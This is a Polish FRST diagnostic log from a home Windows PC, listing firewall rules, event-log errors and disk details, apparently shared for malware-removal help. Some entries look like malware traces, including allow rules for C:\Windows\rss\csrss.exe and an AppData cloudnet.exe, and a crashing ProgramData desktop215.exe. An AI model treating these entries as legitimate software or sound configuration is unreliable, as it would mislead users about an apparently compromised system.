FirewallRules: [{767AEC83-DE4C-431C-948F-8DFD06A004E5}] => (Allow) E:\Bartek\Gry\steam\steam\bin\cef\cef.win7\steamwebhelper.exe
FirewallRules: [{3211E399-4738-4301-83D9-2504AB0A8FDD}] => (Allow) E:\Bartek\Gry\steam\steam\bin\cef\cef.win7\steamwebhelper.exe
FirewallRules: [{F105F267-4C33-4406-ABA9-CD51BBA65CB9}] => (Allow) E:\Bartek\Gry\steam\steam\steamapps\common\Counter-Strike Global Offensive\csgo.exe
FirewallRules: [{C247857C-52A1-4DDB-B978-26B9D0C7FD9C}] => (Allow) E:\Bartek\Gry\steam\steam\steamapps\common\Counter-Strike Global Offensive\csgo.exe
FirewallRules: [{281F8BE4-9B4C-45C3-BDDE-7712D0D3B31F}] => (Allow) E:\Bartek\Gry\NFS UnderGround 2\Mr DJ\Need For Speed Underground 2\SPEED2.EXE
FirewallRules: [{6F8F2DC9-9369-4433-A238-F3DF7B11599B}] => (Allow) E:\Bartek\Gry\NFS UnderGround 2\Mr DJ\Need For Speed Underground 2\SPEED2.EXE
FirewallRules: [{7F19CED1-543B-4F53-9514-897DB2390590}] => (Allow) E:\Bartek\Gry\NFS UnderGround 2\Mr DJ\Need For Speed Underground 2\uniws.exe
FirewallRules: [{66B213C7-A12D-48D9-918F-219B59745D9A}] => (Allow) E:\Bartek\Gry\NFS UnderGround 2\Mr DJ\Need For Speed Underground 2\uniws.exe
FirewallRules: [{960EAAE6-5BFB-4808-B1BA-DC9171BD0C88}] => (Allow) E:\Bartek\Gry\steam\steam\steamapps\common\the witcher 2\Launcher.exe
FirewallRules: [{D514A989-E5E6-42A4-BEB9-B509928C7D8A}] => (Allow) E:\Bartek\Gry\steam\steam\steamapps\common\the witcher 2\Launcher.exe
FirewallRules: [TCP Query User{B9ECB85D-A4A8-420E-8D64-7C33CC102939}E:\bartek\gry\steam\steam\steamapps\common\the witcher 2\bin\witcher2.exe] => (Allow) E:\bartek\gry\steam\steam\steamapps\common\the witcher 2\bin\witcher2.exe
FirewallRules: [UDP Query User{F0C37CA7-BF14-48E5-B117-FC3787C9B70D}E:\bartek\gry\steam\steam\steamapps\common\the witcher 2\bin\witcher2.exe] => (Allow) E:\bartek\gry\steam\steam\steamapps\common\the witcher 2\bin\witcher2.exe
FirewallRules: [{2E360483-7164-4B49-91BF-CD16B915D3A9}] => (Allow) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
FirewallRules: [{1328EABF-076E-4376-91AC-08732F3CD194}] => (Allow) C:\Program Files (x86)\GameforgeLive\gfl_client.exe
FirewallRules: [{2ACB2E51-F44F-4B45-86EB-036C715673A1}] => (Allow) C:\Users\Bartek\AppData\Roaming\EpicNet Inc\CloudNet\cloudnet.exe
FirewallRules: [{C9F64007-2362-4FDC-8AB9-A760F4710803}] => (Allow) C:\Windows\rss\csrss.exe

==================== Punkty Przywracania systemu =========================

16-05-2018 12:55:39 Zaplanowany punkt kontrolny

==================== Wadliwe urządzenia w Menedżerze urządzeń =============

Name: Koprocesor
Description: Koprocesor
Class Guid:
Manufacturer:
Service:
Problem: : The drivers for this device are not installed. (Code 28)
Resolution: To install the drivers for this device, click "Update Driver", which starts the Hardware Update wizard.

==================== Błędy w Dzienniku zdarzeń: =========================

Dziennik Aplikacja:
==================
Error: (05/22/2018 04:13:10 PM) (Source: WinMgmt) (EventID: 10) (User: )
Description: Event filter with query "SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 99" could not be reactivated in namespace "//./root/CIMV2" because of error 0x80041003. Events cannot be delivered through this filter until the problem is corrected.

Error: (05/22/2018 04:09:56 PM) (Source: Wininit) (EventID: 1015) (User: )
Description: Błąd krytycznego procesu systemowego C:\Windows\system32\lsass.exe z kodem stanu 1. Komputer musi być ponownie uruchomiony.

Error: (05/22/2018 03:06:27 PM) (Source: WinMgmt) (EventID: 10) (User: )
Description: Event filter with query "SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 99" could not be reactivated in namespace "//./root/CIMV2" because of error 0x80041003. Events cannot be delivered through this filter until the problem is corrected.

Error: (05/22/2018 11:55:34 AM) (Source: WinMgmt) (EventID: 10) (User: )
Description: Event filter with query "SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 99" could not be reactivated in namespace "//./root/CIMV2" because of error 0x80041003. Events cannot be delivered through this filter until the problem is corrected.

Error: (05/22/2018 12:30:32 AM) (Source: WinMgmt) (EventID: 10) (User: )
Description: Event filter with query "SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 99" could not be reactivated in namespace "//./root/CIMV2" because of error 0x80041003. Events cannot be delivered through this filter until the problem is corrected.

Error: (05/21/2018 02:19:11 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Nazwa aplikacji powodującej błąd: desktop215.exe, wersja: 1.0.0.11, sygnatura czasowa: 0x5b029b40
Nazwa modułu powodującego błąd: desktop215.exe, wersja: 1.0.0.11, sygnatura czasowa: 0x5b029b40
Kod wyjątku: 0x40000015
Przesunięcie błędu: 0x0001579c
Identyfikator procesu powodującego błąd: 0x880
Godzina uruchomienia aplikacji powodującej błąd: 0x01d3f0fda504e570
Ścieżka aplikacji powodującej błąd: C:\ProgramData\yahoochrome_D\desktop215.exe
Ścieżka modułu powodującego błąd: C:\ProgramData\yahoochrome_D\desktop215.exe
Identyfikator raportu: 2a8e1b30-5cf1-11e8-be53-90e6ba8602e5

Error: (05/21/2018 12:56:40 PM) (Source: WinMgmt) (EventID: 10) (User: )
Description: Event filter with query "SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 99" could not be reactivated in namespace "//./root/CIMV2" because of error 0x80041003. Events cannot be delivered through this filter until the problem is corrected.

Error: (05/20/2018 01:23:09 PM) (Source: WinMgmt) (EventID: 10) (User: )
Description: Event filter with query "SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 99" could not be reactivated in namespace "//./root/CIMV2" because of error 0x80041003. Events cannot be delivered through this filter until the problem is corrected.

Dziennik System:
=============
Error: (05/22/2018 04:43:44 PM) (Source: Schannel) (EventID: 4119) (User: ZARZĄDZANIE NT)
Description: Odebrano następujący alert krytyczny: 40.

Error: (05/22/2018 04:43:44 PM) (Source: Schannel) (EventID: 4119) (User: ZARZĄDZANIE NT)
Description: Odebrano następujący alert krytyczny: 70.

Error: (05/22/2018 04:27:43 PM) (Source: Schannel) (EventID: 4119) (User: ZARZĄDZANIE NT)
Description: Odebrano następujący alert krytyczny: 40.

Error: (05/22/2018 04:27:42 PM) (Source: Schannel) (EventID: 4119) (User: ZARZĄDZANIE NT)
Description: Odebrano następujący alert krytyczny: 70.

Error: (05/22/2018 04:19:41 PM) (Source: Schannel) (EventID: 4119) (User: ZARZĄDZANIE NT)
Description: Odebrano następujący alert krytyczny: 40.

Error: (05/22/2018 04:19:40 PM) (Source: Schannel) (EventID: 4119) (User: ZARZĄDZANIE NT)
Description: Odebrano następujący alert krytyczny: 70.

Error: (05/22/2018 04:15:39 PM) (Source: Schannel) (EventID: 4119) (User: ZARZĄDZANIE NT)
Description: Odebrano następujący alert krytyczny: 40.

Error: (05/22/2018 04:15:39 PM) (Source: Schannel) (EventID: 4119) (User: ZARZĄDZANIE NT)
Description: Odebrano następujący alert krytyczny: 70.

==================== Statystyki pamięci ===========================

Procesor: Pentium(R) Dual-Core CPU T4300 @ 2.10GHz
Procent pamięci w użyciu: 47%
Całkowita pamięć fizyczna: 4095.27 MB
Dostępna pamięć fizyczna: 2154.18 MB
Całkowita pamięć wirtualna: 8188.73 MB
Dostępna pamięć wirtualna: 5974.39 MB

==================== Dyski ================================

Drive c: () (Fixed) (Total:70.1 GB) (Free:13.16 GB) NTFS ==>[dysk z komponentami startowymi (pozyskano odczytując BCD)]
Drive d: () (Fixed) (Total:40.1 GB) (Free:39.26 GB) NTFS
Drive e: () (Fixed) (Total:187.89 GB) (Free:23.4 GB) NTFS

==================== MBR & Tablica partycji ==================

========================================================
Disk: 0 (MBR Code: Windows 7/8/10) (Size: 298.1 GB) (Disk ID: D9B3496E)
Partition 1: (Active) - (Size=70.1 GB) - (Type=07 NTFS)
Partition 2: (Not Active) - (Size=40.1 GB) - (Type=07 NTFS)
Partition 3: (Not Active) - (Size=187.9 GB) - (Type=07 NTFS)

==================== Koniec Addition.txt ============================